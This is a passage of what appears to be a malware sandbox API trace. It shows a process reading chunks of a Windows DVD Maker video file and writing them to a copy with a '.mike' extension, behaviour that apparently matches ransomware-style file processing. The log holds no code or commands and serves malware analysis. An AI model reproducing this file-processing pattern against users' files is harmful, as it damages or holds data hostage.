Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.520] GetFileType (hFile=0x288) returned 0x1 [0064.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.520] GetFileType (hFile=0x288) returned 0x1 [0064.520] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2dca20 [0064.520] WriteFile (in: hFile=0x288, lpBuffer=0x21bf0c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21bf0c8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.520] CloseHandle (hObject=0x288) returned 1 [0064.560] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.560] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.560] GetFileType (hFile=0x288) returned 0x1 [0064.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.560] GetFileType (hFile=0x288) returned 0x1 [0064.560] SetFilePointer (in: hFile=0x288, lDistanceToMove=3010560, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2df000 [0064.560] ReadFile (in: hFile=0x288, lpBuffer=0x21c1b90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21c1b90*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.561] CloseHandle (hObject=0x288) returned 1 [0064.561] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.561] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.561] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.562] GetFileType (hFile=0x288) returned 0x1 [0064.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.562] GetFileType (hFile=0x288) returned 0x1 [0064.562] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2df220 [0064.562] WriteFile (in: hFile=0x288, lpBuffer=0x21cc0f8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21cc0f8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.562] CloseHandle (hObject=0x288) returned 1 [0064.601] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.601] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.601] GetFileType (hFile=0x288) returned 0x1 [0064.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.601] GetFileType (hFile=0x288) returned 0x1 [0064.602] SetFilePointer (in: hFile=0x288, lDistanceToMove=3020800, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2e1800 [0064.602] ReadFile (in: hFile=0x288, lpBuffer=0x21cebc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21cebc0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.603] CloseHandle (hObject=0x288) returned 1 [0064.603] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.603] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.603] GetFileType (hFile=0x288) returned 0x1 [0064.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.603] GetFileType (hFile=0x288) returned 0x1 [0064.603] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2e1a20 [0064.604] WriteFile (in: hFile=0x288, lpBuffer=0x21d9128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21d9128*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.604] CloseHandle (hObject=0x288) returned 1 [0064.645] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.645] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.645] GetFileType (hFile=0x288) returned 0x1 [0064.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.645] GetFileType (hFile=0x288) returned 0x1 [0064.645] SetFilePointer (in: hFile=0x288, lDistanceToMove=3031040, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2e4000 [0064.645] ReadFile (in: hFile=0x288, lpBuffer=0x21dbbf0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21dbbf0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.646] CloseHandle (hObject=0x288) returned 1 [0064.647] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.647] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.647] GetFileType (hFile=0x288) returned 0x1 [0064.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.647] GetFileType (hFile=0x288) returned 0x1 [0064.647] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2e4220 [0064.647] WriteFile (in: hFile=0x288, lpBuffer=0x21e6158*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21e6158*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.647] CloseHandle (hObject=0x288) returned 1 [0064.688] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.688] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.688] GetFileType (hFile=0x288) returned 0x1 [0064.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.688] GetFileType (hFile=0x288) returned 0x1 [0064.688] SetFilePointer (in: hFile=0x288, lDistanceToMove=3041280, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2e6800 [0064.688] ReadFile (in: hFile=0x288, lpBuffer=0x21e8c20, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21e8c20*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.689] CloseHandle (hObject=0x288) returned 1 [0064.689] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.690] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.690] GetFileType (hFile=0x288) returned 0x1 [0064.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.690] GetFileType (hFile=0x288) returned 0x1 [0064.690] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2e6a20 [0064.690] WriteFile (in: hFile=0x288, lpBuffer=0x21f3188*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21f3188*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.690] CloseHandle (hObject=0x288) returned 1 [0064.690] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.690] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.691] GetFileType (hFile=0x288) returned 0x1 [0064.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.691] GetFileType (hFile=0x288) returned 0x1 [0064.691] SetFilePointer (in: hFile=0x288, lDistanceToMove=3051520, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2e9000 [0064.691] ReadFile (in: hFile=0x288, lpBuffer=0x21f5c50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21f5c50*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.691] CloseHandle (hObject=0x288) returned 1 [0064.692] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.692] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.692] GetFileType (hFile=0x288) returned 0x1 [0064.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.692] GetFileType (hFile=0x288) returned 0x1 [0064.692] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2e9220 [0064.692] WriteFile (in: hFile=0x288, lpBuffer=0x22001b8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22001b8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.693] CloseHandle (hObject=0x288) returned 1 [0064.693] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.693] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.693] GetFileType (hFile=0x288) returned 0x1 [0064.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.693] GetFileType (hFile=0x288) returned 0x1 [0064.693] SetFilePointer (in: hFile=0x288, lDistanceToMove=3061760, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2eb800 [0064.693] ReadFile (in: hFile=0x288, lpBuffer=0x2202c80, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2202c80*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.694] CloseHandle (hObject=0x288) returned 1 [0064.694] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.694] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.694] GetFileType (hFile=0x288) returned 0x1 [0064.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.694] GetFileType (hFile=0x288) returned 0x1 [0064.694] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2eba20 [0064.694] WriteFile (in: hFile=0x288, lpBuffer=0x220d1e8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x220d1e8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.695] CloseHandle (hObject=0x288) returned 1 [0064.695] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.695] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.695] GetFileType (hFile=0x288) returned 0x1 [0064.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.695] GetFileType (hFile=0x288) returned 0x1 [0064.695] SetFilePointer (in: hFile=0x288, lDistanceToMove=3072000, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2ee000 [0064.695] ReadFile (in: hFile=0x288, lpBuffer=0x220fcb0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x220fcb0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.697] CloseHandle (hObject=0x288) returned 1 [0064.697] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.697] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.697] GetFileType (hFile=0x288) returned 0x1 [0064.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.697] GetFileType (hFile=0x288) returned 0x1 [0064.697] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2ee220 [0064.697] WriteFile (in: hFile=0x288, lpBuffer=0x221a218*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x221a218*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.698] CloseHandle (hObject=0x288) returned 1 [0064.698] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.698] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.698] GetFileType (hFile=0x288) returned 0x1 [0064.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.698] GetFileType (hFile=0x288) returned 0x1 [0064.698] SetFilePointer (in: hFile=0x288, lDistanceToMove=3082240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2f0800 [0064.698] ReadFile (in: hFile=0x288, lpBuffer=0x221cce0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x221cce0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.699] CloseHandle (hObject=0x288) returned 1 [0064.699] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.699] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.699] GetFileType (hFile=0x288) returned 0x1 [0064.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.699] GetFileType (hFile=0x288) returned 0x1 [0064.700] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2f0a20 [0064.700] WriteFile (in: hFile=0x288, lpBuffer=0x2227248*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2227248*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.700] CloseHandle (hObject=0x288) returned 1 [0064.700] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.700] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.700] GetFileType (hFile=0x288) returned 0x1 [0064.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.700] GetFileType (hFile=0x288) returned 0x1 [0064.700] SetFilePointer (in: hFile=0x288, lDistanceToMove=3092480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 